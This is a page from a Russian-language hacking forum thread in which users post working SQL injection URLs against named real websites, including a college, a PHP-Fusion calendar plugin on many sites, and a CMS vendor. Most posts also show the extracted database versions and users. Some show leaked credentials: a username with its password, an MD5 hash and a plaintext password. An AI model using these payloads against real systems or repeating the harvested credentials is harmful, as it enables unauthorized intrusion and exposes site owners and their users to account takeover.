ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 489 из 1242 « Первая < 389439479 485 486 487 488 489 490 491 492 493 499539589989 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #4881  
Старый 21.02.2008, 00:00
Haruka
Познающий
Регистрация: 25.07.2007
Сообщений: 48
Провел на форуме:
119358

Репутация: 19
Отправить сообщение для Haruka с помощью ICQ
По умолчанию
http://borowiha.inetrus.ru/top/inf.php?sid='+union+select+id,pass,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+u sers+where+id=2/*
---
вот еще, но тут дальше расковырять не получилось.если у кого получится пишите в приват:
http://wap-top.ru/top/index.php?p=-1
 
Ответить с цитированием

  #4882  
Старый 21.02.2008, 00:06
Haruka
Познающий
Регистрация: 25.07.2007
Сообщений: 48
Провел на форуме:
119358

Репутация: 19
Отправить сообщение для Haruka с помощью ICQ
По умолчанию
и еще
http://kyky.biz/bibl/index.php?i=1&ver=xml&letter='+union+select+1,2,3, 4,5/*
 
Ответить с цитированием

  #4883  
Старый 21.02.2008, 01:43
Sleep
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
Провел на форуме:
2080216

Репутация: 150
Отправить сообщение для Sleep с помощью ICQ
По умолчанию
http://www.cz-usa.com/product_detail.php?id=159999999+union+select+1,2,V ERSION(),USER(),DATABASE(),6/*
VERSION:4.0.21
 
Ответить с цитированием

  #4884  
Старый 21.02.2008, 07:37
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585

Репутация: 818


Отправить сообщение для b3 с помощью ICQ
По умолчанию
Официальный сайт веб-движка becontent. Очень мне понравилась его административная часть. На сайте есть ссылка на скачку, если изменить алгоритм хеширования с стандартного md5 на md5(md5($pass)) или добавить salt, вполне хороший движок.
А вот и сама уязвимость (банально) :
Цитата:
_http://www.becontent.org/news.php?id=-3+union+select+1,concat_ws(0x3a,username,password) ,3,4+from+users
alfonso : pippo12
Доступ в административную часть я заблокировал, привелегии администратора снял, дабы небыло повторных дефейсов, как ето любят делать "неп0хеки".

СКРИН:


P.S. Профильтровать переменные, изменить алгоритм хеша, не ставить легкие пароли и работать с БД без file_priv отличный движок.
P.S.S Ссылка на скрине Не реклама!!!
Последний раз редактировалось b3; 21.02.2008 в 07:39..
 
Ответить с цитированием

  #4885  
Старый 21.02.2008, 16:47
satana8920
Moderator - Level 7
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187

Репутация: 369


Отправить сообщение для satana8920 с помощью ICQ
По умолчанию
Код HTML:
http://www.kensybrowns.com/infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=2
Код HTML:
http://www.arok.dk/infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=1
Код HTML:
http://www.pinocchioclub.com/infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=1
Код HTML:
http://www.irmilano.it/infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=1
Код HTML:
http://www.maddenitalianleague.eu/infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=2
[HTML]
Код HTML:
http://www.radiyocristal.com/infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=1
меняем значение в переменной ID и смотрим хеш пасса любого юзверя
ЗЫ все для ачата
 
Ответить с цитированием

  #4886  
Старый 21.02.2008, 19:36
1NtR0
Участник форума
Регистрация: 14.04.2007
Сообщений: 197
Провел на форуме:
1122391

Репутация: 209
По умолчанию
www.antioch-college.edu


Код:
http://www.antioch-college.edu/news/releases/index.php?id=213+union+select+1,2,user(),version(),database(),6,7,8,9,10,11,12/*
user() - acollege_colleg1@localhost
database() - acollege_college1
version() - 5.0.27-standard

Код:
http://www.antioch-college.edu/news/releases/index.php?id=213+union+select+1,2,id,4,password,6,7,8,9,10,11,12+from+users/*
id - 13
md5($password) - 97d735d01e2c3e9ba77719db119b8404
password - amaruyama
 
Ответить с цитированием

  #4887  
Старый 21.02.2008, 19:40
CaNNabi$
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509

Репутация: 338
Отправить сообщение для CaNNabi$ с помощью ICQ
По умолчанию
Код:
http://www.vergelijking.be/gsm/data.php?id=0x3127%20union+select+concat_ws(0x2F,version(),database(),user())/*
5.0.32-Debian_7etch1-log/vergelijking/vergelijking@localhost

Код:
http://www.hubbardbrook.org/gis/data.php?id=0x3127%20union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6,7,8/*
4.1.21-community-nt/hbr/hbr_admin@savanna.lternet.edu' in

Код:
http://www.dogrel.com/English/News/article.php?id=0x3127%20union+select+1,2,3,4,concat_ws(0x2F,version(),database(),user()),6,7,8/*
4.1.21/DB_dogrel/dogrel@localhost

Код:
http://www.jdhindia.com/data.php?id=0x3127%20union+select+1,concat_ws(0x2F,version(),database(),user())/*
4.1.22-standard-log/loejclsy_jdh/loejclsy_jdh@localhost

Код:
http://www.somborvaros.org/data.php?lang=sr&id=0x3127%20union+select+1,2,concat_ws(0x2F,version(),database(),user())/*
4.0.18/somborvaros/somborinfo@80.74.160.40
 
Ответить с цитированием

  #4888  
Старый 21.02.2008, 22:43
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию
ЗЫ покопался и нашел еще
Малышу Билли посвящаетцо
часть 1
http://www.revistaoficialdoxbox.com.br/index.php?cat_id=-1012+union+select+1,2,concat(version(),0x3a,user() ,0x3a,database()),4,5/*

5.0.24-locaweb-log:xbox@200.234.201.120:xbox





Это не единственная уязвимое место вот еще
часть2 =)
http://www.revistaoficialdoxbox.com.br/poll_results.php?pollid=2222'+union+select+1,conca t(version(),0x3a,user(),0x3a,database()),3,4/*

еще
http://revistaoficialdoxbox.tempsite.ws
===========================================
Последний раз редактировалось xcedz; 26.02.2008 в 11:40..
 
Ответить с цитированием

  #4889  
Старый 22.02.2008, 00:52
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
2 xcedz
www.dotfiles.com
баян
Замучали его бедного я раза три точно в этой ветке видел
 
Ответить с цитированием

  #4890  
Старый 22.02.2008, 00:57
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию
>баян

антибоян не обновляется... а по всем страничкам лазить бред :d
 
Ответить с цитированием
Ответ
Страница 489 из 1242 « Первая < 389439479 485 486 487 488 489 490 491 492 493 499539589989 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ